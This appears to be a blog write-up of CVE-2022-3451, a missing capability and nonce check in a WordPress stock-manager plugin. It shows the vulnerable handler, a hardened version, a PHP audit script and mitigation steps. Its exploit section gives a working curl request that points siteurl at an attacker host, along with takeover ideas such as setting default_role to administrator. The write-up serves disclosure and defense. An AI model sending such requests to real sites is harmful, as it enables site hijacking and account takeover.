WordPress powers millions of websites, but with popularity comes risk. A recent vulnerability, CVE-2022-3451, was found in the Product Stock Manager plugin, and it should be a warning to anyone running WordPress with third-party plugins. This long read walks through the issue, shows the vulnerable code, and explains how this flaw let even the lowest-privileged users tamper with your site's core settings.
What Is CVE-2022-3451?
CVE-2022-3451 is an authorization vulnerability in the Product Stock Manager plugin for WordPress, affecting versions before 1.0.5. The plugin did not check whether the requesting user was allowed to perform sensitive AJAX actions, nor did it validate which option was being updated. Even worse, the requests were not protected against CSRF (Cross-Site Request Forgery), because no nonce was verified.
In short: Even a basic “subscriber” user could update critical site options just by sending a crafted request.
How Did This Happen?
WordPress plugins often use AJAX for background communication, say, updating stock quantities without reloading the page. These requests are handled in PHP, and every handler that changes state should check two things:
- The user is authorized to perform the action (a capability check such as current_user_can('manage_options')). Being logged in is not the same as being allowed.
- The request is genuine (a CSRF "nonce" minted for this action and verified with check_ajax_referer() or wp_verify_nonce()).
Unfortunately, prior to version 1.0.5, Product Stock Manager did neither on some AJAX calls: it did not check permissions and did not verify a nonce. Here is a simplified look at the problem.
Vulnerable Code (Simplified Snippet)
The vulnerable code resided in the plugin's PHP files, where AJAX handlers were registered like this:

```php
// "wp_ajax_" hooks are reachable by every authenticated user, regardless of role.
add_action('wp_ajax_psm_update_option', 'psm_update_option_callback');

function psm_update_option_callback() {
    // No capability check!
    // No CSRF (nonce) check!
    // Option name and value are taken straight from the request.
    $option_name  = $_POST['option_name'];
    $option_value = $_POST['option_value'];
    update_option($option_name, $option_value); // writes any option in wp_options
    echo 'success';
    wp_die();
}
```
In this code, any logged-in user (subscriber, contributor, author, etc.) could send an AJAX POST request to /wp-admin/admin-ajax.php and update any WordPress option. The user is authenticated, but the plugin never asks whether that user is allowed to change options, and never verifies a nonce that would prove the request came from the plugin's own admin page.
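As an added example (not the plugin's actual patched code, and not from the original post), here is the same handler with the checks described in the fix: nonce verification, a capability check, and an allow-list of option names so the client can no longer pick an arbitrary option. The hook name is the one from the snippet above; the nonce action, the option names, their sanitizers and the script handle are assumptions.

```php
<?php
// Added example: hardened version of the simplified handler above.
// Assumptions: nonce action 'psm_update_option', option names and sanitizers below.

// Registered only for logged-in users ("wp_ajax_"); deliberately no
// "wp_ajax_nopriv_" hook, so anonymous visitors never reach the callback.
add_action( 'wp_ajax_psm_update_option', 'psm_update_option_callback_hardened' );

function psm_update_option_callback_hardened() {
    // 1. CSRF: the request must carry a nonce minted for this action.
    //    check_ajax_referer() dies with a 403-style "-1" when it is missing or stale.
    check_ajax_referer( 'psm_update_option', 'nonce' );

    // 2. Authorization: a subscriber is logged in but must not change site options.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'insufficient privileges' ), 403 );
    }

    // 3. Input validation: never let the client choose the option name.
    //    Only options this plugin owns (assumed names), each with its own sanitizer.
    $allowed = array(
        'psm_low_stock_threshold' => 'absint',
        'psm_notify_email'        => 'sanitize_email',
    );
    $option_name = isset( $_POST['option_name'] )
        ? sanitize_key( wp_unslash( $_POST['option_name'] ) )
        : '';
    if ( ! array_key_exists( $option_name, $allowed ) ) {
        wp_send_json_error( array( 'message' => 'unknown option' ), 400 );
    }

    $raw   = isset( $_POST['option_value'] ) ? wp_unslash( $_POST['option_value'] ) : '';
    $value = call_user_func( $allowed[ $option_name ], $raw );

    update_option( $option_name, $value );
    wp_send_json_success( array( 'option' => $option_name ) );
}

// The plugin's admin page JavaScript needs a matching nonce. Minting it on the
// server and exposing it with wp_localize_script() is the standard pattern;
// the script handle and file name are assumptions.
add_action( 'admin_enqueue_scripts', function () {
    wp_enqueue_script( 'psm-admin', plugins_url( 'admin.js', __FILE__ ), array( 'jquery' ), '1.0', true );
    wp_localize_script( 'psm-admin', 'psmAjax', array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'psm_update_option' ),
    ) );
} );
```

The client then posts `action=psm_update_option` together with `nonce=psmAjax.nonce`. A forged cross-site request cannot know that nonce, and a subscriber who does know it still fails the capability check, so both halves of the original flaw are closed independently. The allow-list is what stops `siteurl` from ever being a valid target, even if the first two checks were somehow bypassed.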
What Could Go Wrong?
WordPress "options" control site behavior, appearance, and even who can log in. With the ability to write any option, an attacker could:
- Change your siteurl or home URL (locking everyone out, or redirecting visitors to a site they control)
- Deactivate security plugins by altering their options
- Open registration (users_can_register) and set default_role to administrator, then simply register an admin account
The attacker only needs a basic subscriber account, one of the lowest WordPress roles.
How an Exploit Works
Here's how a complete exploit looks. All you need is a subscriber login (trivial on any blog with open registration) and a single POST request:

```bash
# Constructed request against a test instance; replace the host and cookie value.
# The cookie name suffix is the site's COOKIEHASH (the md5 of the site URL) and
# can be read from the browser's cookie store after logging in as the subscriber.
curl -X POST https://vulnerable-site.com/wp-admin/admin-ajax.php \
  --data "action=psm_update_option" \
  --data "option_name=siteurl" \
  --data "option_value=https://attacker.com" \
  --cookie "wordpress_logged_in_xxx=your-subscriber-cookie"
```

This request would instantly change the "siteurl" of the WordPress site, breaking it or redirecting all users. No admin password needed.
Because no nonce is checked, an attacker without any account could also weaponize this as a CSRF attack: trick any logged-in user, even an admin, into visiting a page that silently submits the same POST request, and their browser's session cookie does the rest.
Original References and Mitigations
- WPScan Advisory: CVE-2022-3451
- Plugin Changelog and Patch
Fixed in version 1.0.5: the developer added a capability check (current_user_can('manage_options')) and WordPress nonce verification to the AJAX handlers.
Mitigation: update Product Stock Manager to 1.0.5 or later. If you cannot update immediately, deactivate the plugin, and review wp_options (siteurl, home, users_can_register, default_role) and the user list for changes you did not make.
Conclusion: Lessons Learned
CVE-2022-3451 is a textbook case of overlooked security in plugin code. Even a simple check, current_user_can('manage_options'), would have stopped this. For every state-changing AJAX handler, always ensure:
- A capability check: the user is authorized, not merely logged in.
- A nonce check: the request originated from your own page, not a cross-site form.
- Input validation: the client chooses from an allow-list of options or fields, never an arbitrary name.
Stay aware, stay updated, and check your site's plugins today.
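To turn that checklist into something you can run against a plugin directory, here is an added example (not from the plugin or the original post): a small PHP CLI script that finds handlers registered with add_action('wp_ajax_...', 'callback') and flags callbacks whose body contains neither a nonce check nor a capability check. It is a regex-based heuristic for plain-function callbacks, a first pass to decide what to read by hand, not a substitute for review. The sample sources it scans are constructed here.

```php
<?php
// Added example: heuristic static audit of wp_ajax_ handlers (not from the plugin).

function psm_audit_collect_handlers( string $src ): array {
    // Map action name => callback for add_action( 'wp_ajax_*', 'callback' ).
    $handlers = array();
    if ( preg_match_all(
        "/add_action\(\s*['\"](wp_ajax_(?:nopriv_)?[\w-]+)['\"]\s*,\s*['\"](\w+)['\"]/",
        $src, $m, PREG_SET_ORDER ) ) {
        foreach ( $m as $hit ) {
            $handlers[ $hit[1] ] = $hit[2];
        }
    }
    return $handlers;
}

function psm_audit_function_body( string $src, string $name ): ?string {
    // Extract the body of "function $name(...) { ... }" by brace matching.
    // Heuristic: braces inside string literals are not accounted for.
    $re = '/function\s+' . preg_quote( $name, '/' ) . '\s*\([^)]*\)\s*(?::\s*\??\w+)?\s*\{/';
    if ( ! preg_match( $re, $src, $m, PREG_OFFSET_CAPTURE ) ) {
        return null;
    }
    $start = $m[0][1] + strlen( $m[0][0] );
    $depth = 1;
    for ( $i = $start, $n = strlen( $src ); $i < $n; $i++ ) {
        if ( $src[ $i ] === '{' ) {
            $depth++;
        } elseif ( $src[ $i ] === '}' && --$depth === 0 ) {
            return substr( $src, $start, $i - $start );
        }
    }
    return null; // unbalanced braces
}

function psm_audit_source( string $src ): array {
    $findings = array();
    foreach ( psm_audit_collect_handlers( $src ) as $action => $cb ) {
        $body = psm_audit_function_body( $src, $cb );
        if ( $body === null ) {
            $findings[ $action ] = array( 'callback' => $cb, 'note' => 'callback not found in this file' );
            continue;
        }
        $findings[ $action ] = array(
            'callback'   => $cb,
            'nonce'      => (bool) preg_match( '/\b(check_ajax_referer|check_admin_referer|wp_verify_nonce)\s*\(/', $body ),
            'capability' => (bool) preg_match( '/\bcurrent_user_can\s*\(/', $body ),
            // nopriv handlers are reachable without any login at all.
            'nopriv'     => strpos( $action, 'wp_ajax_nopriv_' ) === 0,
        );
    }
    return $findings;
}

function psm_audit_directory( string $dir ): array {
    // Real usage: psm_audit_directory( '/var/www/html/wp-content/plugins' ).
    $out = array();
    $it  = new RecursiveIteratorIterator( new RecursiveDirectoryIterator( $dir ) );
    foreach ( $it as $file ) {
        if ( $file->isFile() && $file->getExtension() === 'php' ) {
            $out[ $file->getPathname() ] = psm_audit_source( file_get_contents( $file->getPathname() ) );
        }
    }
    return $out;
}

// Constructed samples (not real plugin files): the vulnerable shape from the
// post beside a handler that performs both checks.
$samples = array(
    'vulnerable.php' => <<<'PHP'
add_action('wp_ajax_psm_update_option', 'psm_update_option_callback');
function psm_update_option_callback() {
    update_option($_POST['option_name'], $_POST['option_value']);
    wp_die();
}
PHP,
    'hardened.php' => <<<'PHP'
add_action('wp_ajax_psm_save', 'psm_save_cb');
function psm_save_cb(): void {
    check_ajax_referer('psm_save', 'nonce');
    if ( ! current_user_can('manage_options') ) { wp_die(-1, 403); }
    wp_die();
}
PHP,
);

foreach ( $samples as $file => $src ) {
    foreach ( psm_audit_source( $src ) as $action => $f ) {
        $ok = ( $f['nonce'] ?? false ) && ( $f['capability'] ?? false );
        printf( "%-4s %s  %s()  nonce=%s cap=%s%s\n", $ok ? 'ok' : 'FLAG', $action, $f['callback'],
            var_export( $f['nonce'] ?? null, true ), var_export( $f['capability'] ?? null, true ),
            isset( $f['note'] ) ? '  (' . $f['note'] . ')' : '' );
    }
}
```

Run it with `php audit.php`; the vulnerable sample is flagged with nonce=false cap=false, the hardened one prints ok. Swap the `$samples` loop for `psm_audit_directory()` to sweep an installed plugin tree. A FLAG is not proof of a vulnerability (the checks may live in a helper the callback calls, or the handler may be harmless), and ok is not proof of safety (a nonce plus a capability check still leaves an unvalidated option name, which is exactly what made CVE-2022-3451 so damaging), but the list tells you which handlers to read first.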
*For more details:*
- WPScan Full Advisory
- Official Plugin Page
- How to audit your WordPress for vulnerabilities
Did you find this useful? Share your thoughts or ask about auditing your own plugin’s AJAX in the comments!
Timeline
Published on: 11/07/2022 10:15:00 UTC
Last modified on: 07/21/2023 18:21:00 UTC